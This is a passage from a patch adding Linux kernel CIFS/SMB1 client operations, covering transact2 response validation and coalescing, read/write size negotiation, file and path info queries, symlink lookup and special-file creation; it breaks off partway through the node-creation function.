++		>0	transact2 with that much data missing
++		-EINVAL	invalid transact2
++ */
++static int
++check2ndT2(char *buf)
++{
++	struct smb_hdr *pSMB = (struct smb_hdr *)buf;
++	struct smb_t2_rsp *pSMBt;
++	int remaining;
++	__u16 total_data_size, data_in_this_rsp;
++
++	if (pSMB->Command != SMB_COM_TRANSACTION2)
++		return 0;
++
++	/* check for plausible wct, bcc and t2 data and parm sizes */
++	/* check for parm and data offset going beyond end of smb */
++	if (pSMB->WordCount != 10) { /* coalesce_t2 depends on this */
++		cifs_dbg(FYI, "Invalid transact2 word count\n");
++		return -EINVAL;
++	}
++
++	pSMBt = (struct smb_t2_rsp *)pSMB;
++
++	total_data_size = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
++	data_in_this_rsp = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
++
++	if (total_data_size == data_in_this_rsp)
++		return 0;
++	else if (total_data_size < data_in_this_rsp) {
++		cifs_dbg(FYI, "total data %d smaller than data in frame %d\n",
++			 total_data_size, data_in_this_rsp);
++		return -EINVAL;
++	}
++
++	remaining = total_data_size - data_in_this_rsp;
++
++	cifs_dbg(FYI, "missing %d bytes from transact2, check next response\n",
++		 remaining);
++	if (total_data_size > CIFSMaxBufSize) {
++		cifs_dbg(VFS, "TotalDataSize %d is over maximum buffer %d\n",
++			 total_data_size, CIFSMaxBufSize);
++		return -EINVAL;
++	}
++	return remaining;
++}
++
++static int
++coalesce_t2(char *second_buf, struct smb_hdr *target_hdr)
++{
++	struct smb_t2_rsp *pSMBs = (struct smb_t2_rsp *)second_buf;
++	struct smb_t2_rsp *pSMBt  = (struct smb_t2_rsp *)target_hdr;
++	char *data_area_of_tgt;
++	char *data_area_of_src;
++	int remaining;
++	unsigned int byte_count, total_in_tgt;
++	__u16 tgt_total_cnt, src_total_cnt, total_in_src;
++
++	src_total_cnt = get_unaligned_le16(&pSMBs->t2_rsp.TotalDataCount);
++	tgt_total_cnt = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
++
++	if (tgt_total_cnt != src_total_cnt)
++		cifs_dbg(FYI, "total data count of primary and secondary t2 differ source=%hu target=%hu\n",
++			 src_total_cnt, tgt_total_cnt);
++
++	total_in_tgt = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
++
++	remaining = tgt_total_cnt - total_in_tgt;
++
++	if (remaining < 0) {
++		cifs_dbg(FYI, "Server sent too much data. tgt_total_cnt=%hu total_in_tgt=%u\n",
++			 tgt_total_cnt, total_in_tgt);
++		return -EPROTO;
++	}
++
++	if (remaining == 0) {
++		/* nothing to do, ignore */
++		cifs_dbg(FYI, "no more data remains\n");
++		return 0;
++	}
++
++	total_in_src = get_unaligned_le16(&pSMBs->t2_rsp.DataCount);
++	if (remaining < total_in_src)
++		cifs_dbg(FYI, "transact2 2nd response contains too much data\n");
++
++	/* find end of first SMB data area */
++	data_area_of_tgt = (char *)&pSMBt->hdr.Protocol +
++				get_unaligned_le16(&pSMBt->t2_rsp.DataOffset);
++
++	/* validate target area */
++	data_area_of_src = (char *)&pSMBs->hdr.Protocol +
++				get_unaligned_le16(&pSMBs->t2_rsp.DataOffset);
++
++	data_area_of_tgt += total_in_tgt;
++
++	total_in_tgt += total_in_src;
++	/* is the result too big for the field? */
++	if (total_in_tgt > USHRT_MAX) {
++		cifs_dbg(FYI, "coalesced DataCount too large (%u)\n",
++			 total_in_tgt);
++		return -EPROTO;
++	}
++	put_unaligned_le16(total_in_tgt, &pSMBt->t2_rsp.DataCount);
++
++	/* fix up the BCC */
++	byte_count = get_bcc(target_hdr);
++	byte_count += total_in_src;
++	/* is the result too big for the field? */
++	if (byte_count > USHRT_MAX) {
++		cifs_dbg(FYI, "coalesced BCC too large (%u)\n", byte_count);
++		return -EPROTO;
++	}
++	put_bcc(byte_count, target_hdr);
++
++	byte_count = be32_to_cpu(target_hdr->smb_buf_length);
++	byte_count += total_in_src;
++	/* don't allow buffer to overflow */
++	if (byte_count > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
++		cifs_dbg(FYI, "coalesced BCC exceeds buffer size (%u)\n",
++			 byte_count);
++		return -ENOBUFS;
++	}
++	target_hdr->smb_buf_length = cpu_to_be32(byte_count);
++
++	/* copy second buffer into end of first buffer */
++	memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
++
++	if (remaining != total_in_src) {
++		/* more responses to go */
++		cifs_dbg(FYI, "waiting for more secondary responses\n");
++		return 1;
++	}
++
++	/* we are done */
++	cifs_dbg(FYI, "found the last secondary response\n");
++	return 0;
++}
++
++static void
++cifs_downgrade_oplock(struct TCP_Server_Info *server,
++		      struct cifsInodeInfo *cinode, __u32 oplock,
++		      unsigned int epoch, bool *purge_cache)
++{
++	cifs_set_oplock_level(cinode, oplock);
++}
++
++static bool
++cifs_check_trans2(struct mid_q_entry *mid, struct TCP_Server_Info *server,
++		  char *buf, int malformed)
++{
++	if (malformed)
++		return false;
++	if (check2ndT2(buf) <= 0)
++		return false;
++	mid->multiRsp = true;
++	if (mid->resp_buf) {
++		/* merge response - fix up 1st*/
++		malformed = coalesce_t2(buf, mid->resp_buf);
++		if (malformed > 0)
++			return true;
++		/* All parts received or packet is malformed. */
++		mid->multiEnd = true;
++		dequeue_mid(mid, malformed);
++		return true;
++	}
++	if (!server->large_buf) {
++		/*FIXME: switch to already allocated largebuf?*/
++		cifs_dbg(VFS, "1st trans2 resp needs bigbuf\n");
++	} else {
++		/* Have first buffer */
++		mid->resp_buf = buf;
++		mid->large_buf = true;
++		server->bigbuf = NULL;
++	}
++	return true;
++}
++
++static bool
++cifs_need_neg(struct TCP_Server_Info *server)
++{
++	return server->maxBuf == 0;
++}
++
++static int
++cifs_negotiate(const unsigned int xid,
++	       struct cifs_ses *ses,
++	       struct TCP_Server_Info *server)
++{
++	int rc;
++	rc = CIFSSMBNegotiate(xid, ses, server);
++	if (rc == -EAGAIN) {
++		/* retry only once on 1st time connection */
++		set_credits(server, 1);
++		rc = CIFSSMBNegotiate(xid, ses, server);
++		if (rc == -EAGAIN)
++			rc = -EHOSTDOWN;
++	}
++	return rc;
++}
++
++static unsigned int
++cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int wsize;
++
++	/* start with specified wsize, or default */
++	if (ctx->wsize)
++		wsize = ctx->wsize;
++	else if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
++		wsize = CIFS_DEFAULT_IOSIZE;
++	else
++		wsize = CIFS_DEFAULT_NON_POSIX_WSIZE;
++
++	/* can server support 24-bit write sizes? (via UNIX extensions) */
++	if (!tcon->unix_ext || !(unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
++		wsize = min_t(unsigned int, wsize, CIFS_MAX_RFC1002_WSIZE);
++
++	/*
++	 * no CAP_LARGE_WRITE_X or is signing enabled without CAP_UNIX set?
++	 * Limit it to max buffer offered by the server, minus the size of the
++	 * WRITEX header, not including the 4 byte RFC1001 length.
++	 */
++	if (!(server->capabilities & CAP_LARGE_WRITE_X) ||
++	    (!(server->capabilities & CAP_UNIX) && server->sign))
++		wsize = min_t(unsigned int, wsize,
++				server->maxBuf - sizeof(WRITE_REQ) + 4);
++
++	/* hard limit of CIFS_MAX_WSIZE */
++	wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
++
++	return wsize;
++}
++
++static unsigned int
++cifs_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
++{
++	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	unsigned int rsize, defsize;
++
++	/*
++	 * Set default value...
++	 *
++	 * HACK alert! Ancient servers have very small buffers. Even though
++	 * MS-CIFS indicates that servers are only limited by the client's
++	 * bufsize for reads, testing against win98se shows that it throws
++	 * INVALID_PARAMETER errors if you try to request too large a read.
++	 * OS/2 just sends back short reads.
++	 *
++	 * If the server doesn't advertise CAP_LARGE_READ_X, then assume that
++	 * it can't handle a read request larger than its MaxBufferSize either.
++	 */
++	if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_READ_CAP))
++		defsize = CIFS_DEFAULT_IOSIZE;
++	else if (server->capabilities & CAP_LARGE_READ_X)
++		defsize = CIFS_DEFAULT_NON_POSIX_RSIZE;
++	else
++		defsize = server->maxBuf - sizeof(READ_RSP);
++
++	rsize = ctx->rsize ? ctx->rsize : defsize;
++
++	/*
++	 * no CAP_LARGE_READ_X? Then MS-CIFS states that we must limit this to
++	 * the client's MaxBufferSize.
++	 */
++	if (!(server->capabilities & CAP_LARGE_READ_X))
++		rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
++
++	/* hard limit of CIFS_MAX_RSIZE */
++	rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
++
++	return rsize;
++}
++
++static void
++cifs_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct cifs_sb_info *cifs_sb)
++{
++	CIFSSMBQFSDeviceInfo(xid, tcon);
++	CIFSSMBQFSAttributeInfo(xid, tcon);
++}
++
++static int
++cifs_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
++			struct cifs_sb_info *cifs_sb, const char *full_path)
++{
++	int rc;
++	FILE_ALL_INFO *file_info;
++
++	file_info = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
++	if (file_info == NULL)
++		return -ENOMEM;
++
++	rc = CIFSSMBQPathInfo(xid, tcon, full_path, file_info,
++			      0 /* not legacy */, cifs_sb->local_nls,
++			      cifs_remap(cifs_sb));
++
++	if (rc == -EOPNOTSUPP || rc == -EINVAL)
++		rc = SMBQueryInformation(xid, tcon, full_path, file_info,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++	kfree(file_info);
++	return rc;
++}
++
++static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifs_sb_info *cifs_sb, const char *full_path,
++				struct cifs_open_info_data *data, bool *adjustTZ, bool *symlink)
++{
++	int rc;
++	FILE_ALL_INFO fi = {};
++
++	*symlink = false;
++
++	/* could do find first instead but this returns more info */
++	rc = CIFSSMBQPathInfo(xid, tcon, full_path, &fi, 0 /* not legacy */, cifs_sb->local_nls,
++			      cifs_remap(cifs_sb));
++	/*
++	 * BB optimize code so we do not make the above call when server claims
++	 * no NT SMB support and the above call failed at least once - set flag
++	 * in tcon or mount.
++	 */
++	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
++		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
++					 cifs_remap(cifs_sb));
++		*adjustTZ = true;
++	}
++
++	if (!rc) {
++		int tmprc;
++		int oplock = 0;
++		struct cifs_fid fid;
++		struct cifs_open_parms oparms;
++
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
++			return 0;
++
++		oparms = (struct cifs_open_parms) {
++			.tcon = tcon,
++			.cifs_sb = cifs_sb,
++			.desired_access = FILE_READ_ATTRIBUTES,
++			.create_options = cifs_create_options(cifs_sb, 0),
++			.disposition = FILE_OPEN,
++			.path = full_path,
++			.fid = &fid,
++		};
++
++		/* Need to check if this is a symbolic link or not */
++		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
++		if (tmprc == -EOPNOTSUPP)
++			*symlink = true;
++		else if (tmprc == 0)
++			CIFSSMBClose(xid, tcon, fid.netfid);
++	}
++
++	return rc;
++}
++
++static int cifs_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
++			     struct cifs_sb_info *cifs_sb, const char *full_path,
++			     u64 *uniqueid, struct cifs_open_info_data *unused)
++{
++	/*
++	 * We can not use the IndexNumber field by default from Windows or
++	 * Samba (in ALL_INFO buf) but we can request it explicitly. The SNIA
++	 * CIFS spec claims that this value is unique within the scope of a
++	 * share, and the windows docs hint that it's actually unique
++	 * per-machine.
++	 *
++	 * There may be higher info levels that work but are there Windows
++	 * server or network appliances for which IndexNumber field is not
++	 * guaranteed unique?
++	 */
++	return CIFSGetSrvInodeNumber(xid, tcon, full_path, uniqueid,
++				     cifs_sb->local_nls,
++				     cifs_remap(cifs_sb));
++}
++
++static int cifs_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
++				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
++{
++	int rc;
++	FILE_ALL_INFO fi = {};
++
++	if (cfile->symlink_target) {
++		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++		if (!data->symlink_target)
++			return -ENOMEM;
++	}
++
++	rc = CIFSSMBQFileInfo(xid, tcon, cfile->fid.netfid, &fi);
++	if (!rc)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++	return rc;
++}
++
++static void
++cifs_clear_stats(struct cifs_tcon *tcon)
++{
++	atomic_set(&tcon->stats.cifs_stats.num_writes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_reads, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_flushes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_oplock_brks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_opens, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_posixopens, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_posixmkdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_closes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_deletes, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_mkdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_rmdirs, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_renames, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_t2renames, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_ffirst, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_fnext, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_fclose, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_hardlinks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_symlinks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_locks, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_acl_get, 0);
++	atomic_set(&tcon->stats.cifs_stats.num_acl_set, 0);
++}
++
++static void
++cifs_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	seq_printf(m, " Oplocks breaks: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_oplock_brks));
++	seq_printf(m, "\nReads:  %d Bytes: %llu",
++		   atomic_read(&tcon->stats.cifs_stats.num_reads),
++		   (long long)(tcon->bytes_read));
++	seq_printf(m, "\nWrites: %d Bytes: %llu",
++		   atomic_read(&tcon->stats.cifs_stats.num_writes),
++		   (long long)(tcon->bytes_written));
++	seq_printf(m, "\nFlushes: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_flushes));
++	seq_printf(m, "\nLocks: %d HardLinks: %d Symlinks: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_locks),
++		   atomic_read(&tcon->stats.cifs_stats.num_hardlinks),
++		   atomic_read(&tcon->stats.cifs_stats.num_symlinks));
++	seq_printf(m, "\nOpens: %d Closes: %d Deletes: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_opens),
++		   atomic_read(&tcon->stats.cifs_stats.num_closes),
++		   atomic_read(&tcon->stats.cifs_stats.num_deletes));
++	seq_printf(m, "\nPosix Opens: %d Posix Mkdirs: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_posixopens),
++		   atomic_read(&tcon->stats.cifs_stats.num_posixmkdirs));
++	seq_printf(m, "\nMkdirs: %d Rmdirs: %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_mkdirs),
++		   atomic_read(&tcon->stats.cifs_stats.num_rmdirs));
++	seq_printf(m, "\nRenames: %d T2 Renames %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_renames),
++		   atomic_read(&tcon->stats.cifs_stats.num_t2renames));
++	seq_printf(m, "\nFindFirst: %d FNext %d FClose %d",
++		   atomic_read(&tcon->stats.cifs_stats.num_ffirst),
++		   atomic_read(&tcon->stats.cifs_stats.num_fnext),
++		   atomic_read(&tcon->stats.cifs_stats.num_fclose));
++}
++
++static void
++cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
++		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
++		   const unsigned int xid)
++{
++	FILE_BASIC_INFO info;
++	struct cifsInodeInfo *cifsInode;
++	u32 dosattrs;
++	int rc;
++
++	memset(&info, 0, sizeof(info));
++	cifsInode = CIFS_I(inode);
++	dosattrs = cifsInode->cifsAttrs|ATTR_READONLY;
++	info.Attributes = cpu_to_le32(dosattrs);
++	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, &info, cifs_sb->local_nls,
++				cifs_sb);
++	if (rc == 0)
++		cifsInode->cifsAttrs = dosattrs;
++}
++
++static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
++			  void *buf)
++{
++	struct cifs_open_info_data *data = buf;
++	FILE_ALL_INFO fi = {};
++	int rc;
++
++	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
++		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
++				   oparms->disposition,
++				   oparms->desired_access,
++				   oparms->create_options,
++				   &oparms->fid->netfid, oplock, &fi,
++				   oparms->cifs_sb->local_nls,
++				   cifs_remap(oparms->cifs_sb));
++	else
++		rc = CIFS_open(xid, oparms, oplock, &fi);
++
++	if (!rc && data)
++		move_cifs_info_to_smb2(&data->fi, &fi);
++
++	return rc;
++}
++
++static void
++cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
++{
++	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
++	cfile->fid.netfid = fid->netfid;
++	cifs_set_oplock_level(cinode, oplock);
++	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
++}
++
++static void
++cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	CIFSSMBClose(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
++		struct cifs_fid *fid)
++{
++	return CIFSSMBFlush(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_sync_read(const unsigned int xid, struct cifs_fid *pfid,
++	       struct cifs_io_parms *parms, unsigned int *bytes_read,
++	       char **buf, int *buf_type)
++{
++	parms->netfid = pfid->netfid;
++	return CIFSSMBRead(xid, parms, bytes_read, buf, buf_type);
++}
++
++static int
++cifs_sync_write(const unsigned int xid, struct cifs_fid *pfid,
++		struct cifs_io_parms *parms, unsigned int *written,
++		struct kvec *iov, unsigned long nr_segs)
++{
++
++	parms->netfid = pfid->netfid;
++	return CIFSSMBWrite2(xid, parms, written, iov, nr_segs);
++}
++
++static int
++smb_set_file_info(struct inode *inode, const char *full_path,
++		  FILE_BASIC_INFO *buf, const unsigned int xid)
++{
++	int oplock = 0;
++	int rc;
++	__u32 netpid;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct cifsFileInfo *open_file;
++	struct cifsInodeInfo *cinode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++
++	/* if the file is already open for write, just use that fileid */
++	open_file = find_writable_file(cinode, FIND_WR_FSUID_ONLY);
++	if (open_file) {
++		fid.netfid = open_file->fid.netfid;
++		netpid = open_file->pid;
++		tcon = tlink_tcon(open_file->tlink);
++		goto set_via_filehandle;
++	}
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink)) {
++		rc = PTR_ERR(tlink);
++		tlink = NULL;
++		goto out;
++	}
++	tcon = tlink_tcon(tlink);
++
++	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, buf, cifs_sb->local_nls,
++				cifs_sb);
++	if (rc == 0) {
++		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
++		goto out;
++	} else if (rc != -EOPNOTSUPP && rc != -EINVAL) {
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc != 0) {
++		if (rc == -EIO)
++			rc = -EINVAL;
++		goto out;
++	}
++
++	netpid = current->tgid;
++
++set_via_filehandle:
++	rc = CIFSSMBSetFileInfo(xid, tcon, buf, fid.netfid, netpid);
++	if (!rc)
++		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
++
++	if (open_file == NULL)
++		CIFSSMBClose(xid, tcon, fid.netfid);
++	else
++		cifsFileInfo_put(open_file);
++out:
++	if (tlink != NULL)
++		cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int
++cifs_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile)
++{
++	return CIFSSMB_set_compression(xid, tcon, cfile->fid.netfid);
++}
++
++static int
++cifs_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *path, struct cifs_sb_info *cifs_sb,
++		     struct cifs_fid *fid, __u16 search_flags,
++		     struct cifs_search_info *srch_inf)
++{
++	int rc;
++
++	rc = CIFSFindFirst(xid, tcon, path, cifs_sb,
++			   &fid->netfid, search_flags, srch_inf, true);
++	if (rc)
++		cifs_dbg(FYI, "find first failed=%d\n", rc);
++	return rc;
++}
++
++static int
++cifs_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
++		    struct cifs_fid *fid, __u16 search_flags,
++		    struct cifs_search_info *srch_inf)
++{
++	return CIFSFindNext(xid, tcon, fid->netfid, search_flags, srch_inf);
++}
++
++static int
++cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct cifs_fid *fid)
++{
++	return CIFSFindClose(xid, tcon, fid->netfid);
++}
++
++static int
++cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
++{
++	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
++			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
++}
++
++static int
++cifs_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
++	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
++{
++	int rc = -EOPNOTSUPP;
++
++	buf->f_type = CIFS_SUPER_MAGIC;
++
++	/*
++	 * We could add a second check for a QFS Unix capability bit
++	 */
++	if ((tcon->ses->capabilities & CAP_UNIX) &&
++	    (CIFS_POSIX_EXTENSIONS & le64_to_cpu(tcon->fsUnixInfo.Capability)))
++		rc = CIFSSMBQFSPosixInfo(xid, tcon, buf);
++
++	/*
++	 * Only need to call the old QFSInfo if failed on newer one,
++	 * e.g. by OS/2.
++	 **/
++	if (rc && (tcon->ses->capabilities & CAP_NT_SMBS))
++		rc = CIFSSMBQFSInfo(xid, tcon, buf);
++
++	/*
++	 * Some old Windows servers also do not support level 103, retry with
++	 * older level one if old server failed the previous call or we
++	 * bypassed it because we detected that this was an older LANMAN sess
++	 */
++	if (rc)
++		rc = SMBOldQFSInfo(xid, tcon, buf);
++	return rc;
++}
++
++static int
++cifs_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
++	       __u64 length, __u32 type, int lock, int unlock, bool wait)
++{
++	return CIFSSMBLock(xid, tlink_tcon(cfile->tlink), cfile->fid.netfid,
++			   current->tgid, length, offset, unlock, lock,
++			   (__u8)type, wait, 0);
++}
++
++static int
++cifs_unix_dfs_readlink(const unsigned int xid, struct cifs_tcon *tcon,
++		       const unsigned char *searchName, char **symlinkinfo,
++		       const struct nls_table *nls_codepage)
++{
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	int rc;
++	struct dfs_info3_param referral = {0};
++
++	rc = get_dfs_path(xid, tcon->ses, searchName, nls_codepage, &referral,
++			  0);
++
++	if (!rc) {
++		*symlinkinfo = kstrdup(referral.node_name, GFP_KERNEL);
++		free_dfs_info_param(&referral);
++		if (!*symlinkinfo)
++			rc = -ENOMEM;
++	}
++	return rc;
++#else /* No DFS support */
++	return -EREMOTE;
++#endif
++}
++
++static int
++cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifs_sb_info *cifs_sb, const char *full_path,
++		   char **target_path, bool is_reparse_point)
++{
++	int rc;
++	int oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++
++	cifs_dbg(FYI, "%s: path: %s\n", __func__, full_path);
++
++	if (is_reparse_point) {
++		cifs_dbg(VFS, "reparse points not handled for SMB1 symlinks\n");
++		return -EOPNOTSUPP;
++	}
++
++	/* Check for unix extensions */
++	if (cap_unix(tcon->ses)) {
++		rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path,
++					     cifs_sb->local_nls,
++					     cifs_remap(cifs_sb));
++		if (rc == -EREMOTE)
++			rc = cifs_unix_dfs_readlink(xid, tcon, full_path,
++						    target_path,
++						    cifs_sb->local_nls);
++
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = FILE_READ_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb,
++						      OPEN_REPARSE_POINT),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		goto out;
++
++	rc = CIFSSMBQuerySymLink(xid, tcon, fid.netfid, target_path,
++				 cifs_sb->local_nls);
++	if (rc)
++		goto out_close;
++
++	convert_delimiter(*target_path, '/');
++out_close:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	if (!rc)
++		cifs_dbg(FYI, "%s: target path: %s\n", __func__, *target_path);
++	return rc;
++}
++
++static bool
++cifs_is_read_op(__u32 oplock)
++{
++	return oplock == OPLOCK_READ;
++}
++
++static unsigned int
++cifs_wp_retry_size(struct inode *inode)
++{
++	return CIFS_SB(inode->i_sb)->ctx->wsize;
++}
++
++static bool
++cifs_dir_needs_close(struct cifsFileInfo *cfile)
++{
++	return !cfile->srch_inf.endOfSearch && !cfile->invalidHandle;
++}
++
++static bool
++cifs_can_echo(struct TCP_Server_Info *server)
++{
++	if (server->tcpStatus == CifsGood)
++		return true;
++
++	return false;
++}
++
++static int
++cifs_make_node(unsigned int xid, struct inode *inode,
++	       struct dentry *dentry, struct cifs_tcon *tcon,
++	       const char *full_path, umode_t mode, dev_t dev)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct inode *newinode = NULL;
++	int rc = -EPERM;
++	struct cifs_open_info_data buf = {};
++	struct cifs_io_parms io_parms;
++	__u32 oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	unsigned int bytes_written;
++	struct win_dev *pdev;
++	struct kvec iov[2];
++
++	if (tcon->unix_ext) {
++		/*
++		 * SMB1 Unix Extensions: requires server support but
++		 * works with all special files
++		 */
++		struct cifs_unix_set_info_args args = {
++			.mode	= mode & ~current_umask(),
++			.ctime	= NO_CHANGE_64,
++			.atime	= NO_CHANGE_64,
++			.mtime	= NO_CHANGE_64,
++			.device	= dev,
++		};
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SET_UID) {
++			args.uid = current_fsuid();
++			args.gid = current_fsgid();
++		} else {
++			args.uid = INVALID_UID; /* no change */
++			args.gid = INVALID_GID; /* no change */
++		}
++		rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args,
++					    cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++		if (rc)
++			return rc;
++
++		rc = cifs_get_inode_info_unix(&newinode, full_path,
++					      inode->i_sb, xid);
++
++		if (rc == 0)
++			d_instantiate(dentry, newinode);
++		return rc;
++	}
++
++	/*
++	 * SMB1 SFU emulation: should work with all servers, but only
++	 * support block and char device (no socket & fifo)
++	 */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
++		return rc;
++
++	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++		return rc;
++
++	cifs_dbg(FYI, "sfu compat create special file\n");
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
++	if (rc)
++		return rc;
++
++	/*
++	 * BB Do not bother to decode buf since no local inode yet to put
++	 * timestamps in, but we can reuse it safely.
++	 */
++
++	pdev = (struct win_dev *)&buf.fi;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = sizeof(struct win_dev);
++	iov[1].iov_base = &buf.fi;
